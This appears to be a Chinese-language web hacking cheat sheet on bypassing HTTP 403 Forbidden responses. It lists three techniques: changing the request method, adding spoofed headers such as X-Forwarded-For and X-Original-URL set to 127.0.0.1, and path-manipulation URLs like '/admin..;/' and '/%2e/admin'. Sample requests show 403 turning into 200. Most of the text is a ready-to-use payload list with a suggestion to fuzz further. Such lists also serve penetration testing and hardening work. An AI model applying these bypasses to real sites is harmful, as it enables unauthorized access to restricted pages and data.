破解状态码403页面方法总结

403 Forbidden 是HTTP协议中的一个状态码(Status Code), 白话理解，没有权限访问此站 。该状态表示服务器处理了本次请求，但是拒绝执行该项请求 。

每当发现403页面时，这意味着里面可能有一些开发者不想让我们知道的信息。这里我们简单讨论几种。

1、修改请求方法(Change requested method)：

GET → POST, GET → TRACE, GET → PUT, GET → OPTION

效果如下：

GET /api HTTP/1.1

Response

HTTP/1.1 403

POST /api HTTP/1.1

X-Forwared-Host: 127.0.0.1

Response

HTTP/1.1 200 OK

2、向请求模块添加头信息(包括但不限于ReFerer):

ReFerer:https://xxx/auth/login

X-rewrite-url: 127.0.0.1

X-Original-URL: 127.0.0.1

X-Custom-IP-Authorization: 127.0.0.1

X-Forwarded-For: 127.0.0.1

X-Originating-IP: 127.0.0.1

X-Remote-IP: 127.0.0.1

X-Client-IP: 127.0.0.1

X-Forwarded-For: 127.0.0.1

X-Forwared-Host: 127.0.0.1

X-Host: 127.0.0.1

X-Custom-IP-Authorization: 127.0.0.1

效果如下:

GET /auth/login HTTP/1.1

Response

HTTP/1.1 403

GET /auth/login HTTP/1.1

X-Forwared-Host: 127.0.0.1

Response

HTTP/1.1 200 OK

注：不局限于127.0.0.1,可拓宽思路，比如多个子域。可以进行FUZZ。

3、扩展名绕过(Extension bypass):

site.com/admin => 403

site.com/admin/ => 200

site.com/admin/*/ => 200

site.com/admin// => 200

site.com//admin// => 200

site.com/admin/* => 200

site.com/admin/. => 200

site.com/admin/./ => 200

site.com/./admin/./ => 200

site.com/admin/./. => 200

site.com/admin? => 200

site.com/admin/./. => 200

site.com/admin??? => 200

site.com/admin..;/ => 200

site.com/%2f/admin => 200

site.com/%2e/admin => 200

site.com/admin?? => 200

site.com/admin%09/ => 200

site.com/admin%20/ => 200

site.com/admin/..;/ => 200

site.com/%20admin%20/ => 200